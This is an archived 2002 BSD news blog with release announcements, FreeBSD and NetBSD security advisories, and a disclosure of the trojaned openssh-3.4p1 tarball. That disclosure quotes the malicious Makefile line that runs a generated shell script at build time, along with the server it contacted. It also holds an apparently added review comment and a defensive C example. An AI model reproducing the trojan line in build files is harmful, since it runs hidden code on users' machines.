
BSDFreaks.nl

For starters and advanced *BSD users


*BSD news from the past

FreeBSD 4.7 code freeze on September 1, 2002

August 16, 2002 by Rob

Additions for the 4.7 release, which is scheduled for October 1, can still be made until September 1.
The announcement:
[quote]Date: Mon, 12 Aug 2002 02:08:07 -0700
From: Murray Stokely
To: stable@freebsd.org
Cc: qa@FreeBSD.org, re@FreeBSD.org
Subject: HEADS UP: FreeBSD 4.7 Code Freeze in less than a month

It’s about that time already — FreeBSD 4.7 is just around the corner.
Now is the time to speak up about any problems with the new code that
has been introduced since 4.6. Please email the relevant
maintainers/committers for any specific bug fixes or enhancements that
you think should be MFCed for FreeBSD 4.7.

The code freeze date is firmly set, and barring any stability or
security problems, we intend to release on October 1.

Code Freeze: September 1, 2002
Release Candidate 1: September 15, 2002
Release Candidate 2: September 20, 2002
Release Candidate 3: September 25, 2002
Final release: October 1, 2002

For a more detailed schedule of the release process, please see
http://www.FreeBSD.org/releases/4.7R/schedule.html

Also, please remember to send all requests to re@FreeBSD.org. I will
be in Taiwan and Japan for parts of the code freeze, so replies to
messages addressed to me personally may be significantly delayed
during the month of September.

Thanks!

– Murray Stokely / Release Engineering Team [/quote]

Filed Under: *BSD news from the past

FreeBSD 4.6.2 released

August 16, 2002 by Rob

FreeBSD 4.6.2 has been released; this server is now running 4.6.2 as well.
The full announcement:
[quote]I am happy to announce the availability of FreeBSD 4.6.2-RELEASE, a
maintenance release of the FreeBSD -STABLE development branch. Since
FreeBSD 4.6-RELEASE in June 2002, we have resolved several ATA-related
problems, updated the system OpenSSL and OpenSSH components, and
addressed several security issues.

For a list of new features and known problems, please see the release
notes and errata list, available here:

http://www.FreeBSD.org/releases/4.6.2R/relnotes.html
http://www.FreeBSD.org/releases/4.6.2R/errata.html

For more information about FreeBSD release engineering activities
(including information about the upcoming FreeBSD 4.7), please see:

http://www.FreeBSD.org/releng/

Availability
------------

FreeBSD 4.6.2-RELEASE supports the i386 and alpha architectures and
can be installed directly over the net using the boot floppies or
copied to a local NFS/FTP server. Distributions for the i386 are
available now. As of this writing, the final builds for the alpha
architecture are in progress and will be made available shortly.

We can’t promise that all the mirror sites will carry the larger ISO
images, but they will at least be available from:

ftp://ftp.FreeBSD.org
ftp://ftp2.FreeBSD.org
ftp://ftp.dk.FreeBSD.org
ftp://ftp.ru.FreeBSD.org
ftp://ftp.tw.FreeBSD.org
ftp://ftp10.tw.FreeBSD.org

If you can’t afford FreeBSD on media, are impatient, or just want to
use it for evangelism purposes, then by all means download the ISO
images, otherwise please continue to support the FreeBSD Project by
purchasing media from one of our supporting vendors. The following
companies will be offering FreeBSD 4.6.2 based products:

FreeBSD Mall, Inc. http://www.freebsdmall.com/
FreeBSD Services Ltd. http://www.freebsd-services.com/

FreeBSD is also available via anonymous FTP from mirror sites in the
following countries: Argentina, Australia, Brazil, Bulgaria, Canada,
China, Czech Republic, Denmark, Estonia, Finland, France, Germany,
Hong Kong, Hungary, Iceland, Ireland, Israel, Japan, Korea, Lithuania,
the Netherlands, New Zealand, Poland, Portugal, Romania, Russia, Saudi
Arabia, South Africa, Slovak Republic, Slovenia, Spain, Sweden,
Taiwan, Thailand, Ukraine, and the United Kingdom.

Before trying the central FTP site, please check your regional
mirror(s) first by going to:

ftp://ftp..FreeBSD.org/pub/FreeBSD

Any additional mirror sites will be labeled ftp2, ftp3 and so on.

More information about FreeBSD mirror sites can be found at:

http://www.FreeBSD.org/doc/en_US.ISO8859-1/books/handbook/mirrors-ftp.html

For instructions on installing FreeBSD, please see Chapter 2 of The
FreeBSD Handbook. It provides a complete installation walk-through for
users new to FreeBSD, and can be found online at:

http://www.FreeBSD.org/doc/en_US.ISO8859-1/books/handbook/install.html

Acknowledgments
---------------

Many companies donated equipment, network access, or man-hours to
finance the release engineering activities for FreeBSD 4.6.2,
including Compaq, Yahoo!, Sentex Communications, NTT/Verio, and The
FreeBSD Mall.

In addition to myself, the release engineering team for 4.6.2-RELEASE
includes:

Bruce A. Mah Release Engineering, Documentation
Robert Watson Release Engineering, Security
John Baldwin Release Engineering
Brian Somers Release Engineering
Steve Price Package Building
Will Andrews Package Building
Kris Kennaway Package Building
Jacques A. Vidrine Security Officer

Enjoy![/quote]

Filed Under: *BSD news from the past

G.O.B.I.E. preview

August 8, 2002 by Rob

G.O.B.I.E – Graphic OpenBSD Installation Engine

G.O.B.I.E. is a project that aims to make it possible to install OpenBSD graphically. The project is being built in the spirit of OpenBSD, which means they try to keep the installation as close as possible to OpenBSD's text install.

G.O.B.I.E. wants to add value to the product by creating installation modules for well-known services such as BIND, Sendmail and Apache.

Here are a [url=http://www.gobie.net/screenshots.html]few screenshots[/url] of what G.O.B.I.E. is supposed to look like.

Filed Under: *BSD news from the past

FreeBSD security patches (kqueue, nfs, ffs and an update for openssl)

August 7, 2002 by Rob

It keeps raining security patches (just like outside). This time it is the turn of kqueue, nfs and ffs. In addition, there is an update to the openssl security patch.
Below are the links to the workarounds and the fixes:
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:37.kqueue.asc]kqueue[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:36.nfs.asc]nfs server[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:35.ffs.asc]ffs filesystem[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:33.openssl.asc]openssl[/url]

Filed Under: *BSD news from the past

Security bugs in NetBSD

August 3, 2002 by Rob

After FreeBSD, NetBSD is now also coming out with security patches for:
[url=ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-010.txt.asc]pppd[/url]
[url=ftp://ftp.NetBSD.ORG/pub/NetBSD/security/advisories/NetBSD-SA2002-011.txt.asc]Sun RPC XDR decoder[/url]
[url=ftp://ftp.NetBSD.ORG/pub/NetBSD/security/advisories/NetBSD-SA2002-009.txt.asc]and OpenSSL[/url]

which shows once again that the various BSDs share their code.

Filed Under: *BSD news from the past

FreeBSD 4.6.1 status and future releases

August 2, 2002 by Rob

FreeBSD 4.6.1 will probably be released sometime next week, according to an e-mail from Murray Stokely, a member of the FreeBSD release engineering team. The biggest obstacle for 4.6.1 has been the ATA problems, which have been fixed by a few code changes. The security officers want to call this release 4.6.2 because of the latest FreeBSD security issues and code fixes.

The latest FreeBSD schedule for future releases can be found on the [url=http://www.freebsd.org/releng/index.html#schedule]FreeBSD Engineering Info page.[/url]

The full article follows:

[quote]

**********************************************
From: Murray Stokely
To: vendors@FreeBSD.org
Cc: re@FreeBSD.org
Subject: 4.6.1

The ATA problems appear to be fixed with Soren’s most recent change.
This was the biggest holdup for 4.6.1. We also have a successful
package build for the point release. However, in light of new
vulnerabilities, the security officers are going to merge in a few
more changes. The so@ would like to call the release 4.6.2 in light
of these new additions and the fact that the RELENG_4_6 branch has
been called 4.6.1 for over 10 days now.

Please email re@ and so@ if calling the release 4.6.2 ISO would
adversely affect your business (i.e., you already have labels printed
that say 4.6.1?).

We are going to have to rebuild the packages with these new security
fixes, so we are again, at least half a week away from the release. ;(

– Murray

[/quote]

Filed Under: *BSD news from the past

OpenSSH from ftp.openbsd.org contained a trojan

August 2, 2002 by Rob

Edwin Groothuis discovered that a tainted OpenSSH was present on the openbsd.org FTP site.
This tainted OpenSSH modified the configure script so that a shell script is generated that tries to connect
to an Australian server and may thereby be able to carry out a DDoS attack.
The infected file has since been removed.

The mail from Edwin Groothuis:
[quote]Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package on ftp.openbsd.org
(and probably all its mirrors now) is trojaned:

ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)

The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
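Review bot: The added recipe line under the "all:" target executes code at build time, which a target that only builds libopenbsd-compat.a has no reason to do: it compiles bf-test.c, runs the resulting binary, and passes its output to sh in the background, while the leading "@" keeps the command out of make's output. The line should be rejected, and any tarball containing it compared against a known-good checksum before it is built.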

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to a
server running on 203.62.158.32:6667 (web.snsonline.net).

[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin[/quote]

Filed Under: *BSD news from the past

Several security holes in FreeBSD

August 2, 2002 by Rob

After the report of the hole in stdio, a number of further security holes have been reported.
The following programs have a problem:
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:32.pppd.asc]FreeBSD-SA-02:32.pppd Topic: exploitable race condition in pppd[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:33.openssl.asc]FreeBSD-SA-02:33.openssl Topic: openssl contains multiple vulnerabilities[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:34.rpc.asc]FreeBSD-SA-02:34.rpc Topic: Sun RPC XDR decoder contains buffer overflow[/url]

Unfortunately, this web server has lost its uptime again as well.
So update your world to be on the safe side.
If you want to be notified automatically of security announcements, send an e-mail to:
majordomo@FreeBSD.ORG with
subscribe freebsd-security-notifications jaap@aap.nl

in the message body.

Filed Under: *BSD news from the past

FreeBSD Security Advisory: stdio part 2

July 30, 2002 by Rob

The FreeBSD security team has posted a revised security advisory. The advisory concerns insecure handling of stdio file descriptors. It affects all releases of FreeBSD up to and including 4.6.
The original fix for this problem did not resolve everything, so a new patch is available.

As a result, local users can still gain superuser privileges.
It is known that the ‘keyinit’ set-user-id program is still exploitable using this method. There is a possibility that more programs are exploitable.

The advisory:
[quote]

************************************
Date: Tue, 30 Jul 2002 11:21:05 -0700 (PDT)
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio [REVISED]

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-02:23.stdio Security Advisory
The FreeBSD Project

Topic: insecure handling of stdio file descriptors

Category: core
Module: kernel
Announced: 2002-04-22
Credits: Joost Pol,
         Georgi Guninski
Affects: All releases of FreeBSD up to and including 4.6-RELEASE
         4.6-STABLE prior to the correction date
Corrected: 2002-07-30 15:40:46 UTC (RELENG_4)
           2002-07-30 15:42:11 UTC (RELENG_4_6)
           2002-07-30 15:42:46 UTC (RELENG_4_5)
           2002-07-30 15:43:17 UTC (RELENG_4_4)
FreeBSD only: NO

0. Revision History

v1.0 2002-04-22 Initial release
v1.1 2002-04-23 Patch and revision numbers updated
v1.2 2002-07-29 procfs issue; updated patch

I. Background

By convention, POSIX systems associate file descriptors 0, 1, and 2
with standard input, standard output, and standard error,
respectively. Almost all applications give these stdio file
descriptors special significance, such as writing error messages to
standard error (file descriptor 2).

In new processes, all file descriptors are duplicated from the parent
process. Unless these descriptors are marked close-on-exec, they
retain their state during an exec.

All POSIX systems assign file descriptors in sequential order,
starting with the lowest unused file descriptor. For example, if a
newly exec’d process has file descriptors 0 and 1 open, but file
descriptor 2 closed, and then opens a file, the new file descriptor is
guaranteed to be 2 (standard error).

II. Problem Description

Some programs are set-user-id or set-group-id, and therefore run with
increased privileges. If such a program is started with some of the
stdio file descriptors closed, the program may open a file and
inadvertently associate it with standard input, standard output, or
standard error. The program may then read data from or write data to
the file inappropriately. If the file is one that the user would
normally not have privileges to open, this may result in an
opportunity for privilege escalation.

The original correction for this problem (corresponding to the first
revision of this advisory) contained an error. Systems using procfs
or linprocfs could still be exploited. The dates for the original,
incomplete correction were:

Corrected: 2002-04-21 13:06:45 UTC (RELENG_4)
2002-04-21 13:08:57 UTC (RELENG_4_5)
2002-04-21 13:10:51 UTC (RELENG_4_4)

III. Impact

Local users may gain superuser privileges. It is known that the
`keyinit’ set-user-id program is exploitable using this method. There
may be other programs that are exploitable.

IV. Workaround

[FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11]

None. The set-user-id bit may be removed from `keyinit’ using the
following command, but note that there may be other programs that can
be exploited.

# chmod 0555 /usr/bin/keyinit

[FreeBSD versions 4.5-RELEASE-p4 or later, 4.4-RELEASE-p11 or later,
4.6-RELEASE, and 4.6-STABLE]

Unmount all instances of the procfs and linprocfs filesystems using
the umount(8) command:

# umount -f -a -t procfs
# umount -f -a -t linprocfs

V. Solution

The kernel was modified to check file descriptors 0, 1, and 2 when
starting a set-user-ID or set-group-ID executable. If any of these
are not in use, they will be redirected to /dev/null.

1) Upgrade your vulnerable system to 4.6-STABLE; or to any of
the RELENG_4_6 (4.6.1-RELEASE-p1), RELENG_4_5 (4.5-RELEASE-p10), or
RELENG_4_4 (4.4-RELEASE-p17) security branches dated after the
respective correction dates.

2) To patch your present system:

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C…tdio.patch.v1.2
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C….patch.v1.2.asc

[FreeBSD versions 4.5-RELEASE-p4 or later, 4.4-RELEASE-p11 or later,
4.6-RELEASE, and 4.6-STABLE]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C…dio2.patch.v1.2
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C….patch.v1.2.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
http://www.freebsd.org/handbook/kernelconfig.html and reboot the
system.

VI. Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Path                                Revision
  Branch
- -------------------------------------------------------------------------
sys/sys/filedesc.h
  RELENG_4                          1.19.2.4
  RELENG_4_6                        1.19.2.4
  RELENG_4_5                        1.19.2.3.6.1
  RELENG_4_4                        1.19.2.3.4.1
sys/kern/kern_exec.c
  RELENG_4                          1.107.2.15
  RELENG_4_6                        1.107.2.14.2.1
  RELENG_4_5                        1.107.2.13.2.2
  RELENG_4_4                        1.107.2.8.2.3
sys/kern/kern_descrip.c
  RELENG_4                          1.81.2.12
  RELENG_4_6                        1.81.2.14
  RELENG_4_5                        1.81.2.9.2.2
  RELENG_4_4                        1.81.2.8.2.2
sys/conf/newvers.sh
  RELENG_4_6                        1.44.2.23.2.6
  RELENG_4_5                        1.44.2.20.2.11
  RELENG_4_4                        1.44.2.17.2.16
- -------------------------------------------------------------------------

VII. References

PINE-CERT-20020401
[/quote]
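
The descriptor-assignment rule from section I of the advisory and the /dev/null redirection from section V, as an added C example that is not part of the advisory or of FreeBSD's kernel patch: a user-space version of the same check that a privileged program can run before it opens any file. The function names sanitize_stdio_fds and lowest_fd_after_closing_stderr are hypothetical.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Added example; function names are hypothetical, not FreeBSD's patch. */
/* 1 if fd is an open descriptor, 0 if it is closed (EBADF). */
static int fd_is_open(int fd)
{
    return fcntl(fd, F_GETFD) != -1 || errno != EBADF;
}

/* Point every closed descriptor in 0..2 at /dev/null so that a later
 * open() can never be handed a stdio slot. Returns the number of
 * descriptors repaired, or -1 if /dev/null could not be attached. */
int sanitize_stdio_fds(void)
{
    int repaired = 0;

    for (int fd = 0; fd <= 2; fd++) {
        if (fd_is_open(fd))
            continue;
        int nfd = open("/dev/null", O_RDWR);
        if (nfd == -1)
            return -1;
        if (nfd != fd) {              /* not the slot we wanted: move it */
            if (dup2(nfd, fd) == -1) {
                close(nfd);
                return -1;
            }
            close(nfd);
        }
        repaired++;
    }
    return repaired;
}

/* Shows the lowest-unused-descriptor rule: with 0 and 1 open and 2
 * closed, the next open() returns 2. The original stderr is restored
 * before the observed descriptor number is returned. */
int lowest_fd_after_closing_stderr(void)
{
    if (sanitize_stdio_fds() == -1)
        return -1;
    int saved = dup(2);               /* lands on some fd >= 3 */
    if (saved == -1)
        return -1;
    close(2);
    int fd = open("/dev/null", O_WRONLY);  /* stands in for a data file */
    if (fd != -1 && fd != 2)
        close(fd);
    dup2(saved, 2);                   /* replaces fd 2 with real stderr */
    close(saved);
    return fd;
}

int main(void)
{
    /* A set-user-ID program would make this its first call. */
    if (sanitize_stdio_fds() == -1)
        return 1;
    printf("open() after close(2) got fd %d\n", lowest_fd_after_closing_stderr());
    return 0;
}
```

On a patched kernel the check is redundant for set-user-ID and set-group-ID executables, but it also covers privileged programs started by other means, such as daemons launched by root.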

Filed Under: *BSD news from the past

IPFW2 available for FreeBSD stable

July 27, 2002 by Rob

Luigi Rizzo has added his new ipfw (firewall) code to FreeBSD stable. According to his measurements, the new code is twice as fast at processing individual firewall rules. Conveniently, the ruleset syntax is backward compatible.

The full announcement:
[quote]
FYI….

(please read the commit log below before complaining).

cheers
luigi

----- Forwarded message from Luigi Rizzo -----

Date: Tue, 23 Jul 2002 20:21:24 -0700 (PDT)
From: Luigi Rizzo
Subject: cvs commit: src/sys/netinet ip_fw2.c ip_fw2.h src/sys/conf files
options src/sbin/ipfw Makefile ipfw2.c src/lib/libalias Makefile
alias_db.c
To: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG

luigi 2002/07/23 20:21:24 PDT

Modified files: (Branch: RELENG_4)
sys/conf options files
sbin/ipfw Makefile
lib/libalias Makefile alias_db.c
Added files: (Branch: RELENG_4)
sys/netinet ip_fw2.h ip_fw2.c
sbin/ipfw ipfw2.c
Log:
Bring ipfw2 into the -stable tree. This will give more people a
chance to test it, and hopefully accelerate the transition from the
old to the new ipfw code.

NOTE: THIS COMMIT WILL NOT CHANGE THE FIREWALL YOU USE,
NOR A SINGLE BIT IN YOUR KERNEL AND BINARIES.
YOU WILL KEEP USING YOUR OLD “ipfw” UNLESS YOU:

+ add “options IPFW2” (undocumented) to your kernel config file;

+ compile and install sbin/ipfw and lib/libalias with
make -DIPFW2

in other words, you must really want it.

On the other hand, i believe you do really want to use this new
code. In addition to being twice as fast in processing individual
rules, you can use more powerful match patterns such as

… ip from 1.2.3.0/24{50,6,27,158} to …
… ip from { 1.2.3.4/26 or 5.6.7.8/22 } to …
… ip from any 5-7,9-66,1020-3000,4000-5000 to …

i.e. match sparse sets of IP addresses in constant time; use “or”
connectives between match patterns; have multiple port ranges; etc.
which I believe will dramatically reduce your ruleset size.

As an additional bonus, “keep-state” rules will now send keepalives
when the rule is about to expire, so you will not have your remote
login sessions die while you are idle.

The syntax is backward compatible with the old ipfw.
A manual page documenting the extensions has yet to be completed.

Revision Changes Path
1.13.2.5 +4 -1 src/lib/libalias/Makefile
1.21.2.14 +151 -36 src/lib/libalias/alias_db.c
1.6.6.3 +5 -1 src/sbin/ipfw/Makefile
1.4.2.1 +3166 -0 src/sbin/ipfw/ipfw2.c (new)
1.340.2.107 +1 -0 src/sys/conf/files
1.191.2.41 +1 -0 src/sys/conf/options
1.6.2.1 +2622 -0 src/sys/netinet/ip_fw2.c (new)
1.1.2.1 +404 -0 src/sys/netinet/ip_fw2.h (new)
[/quote]

Filed Under: *BSD news from the past
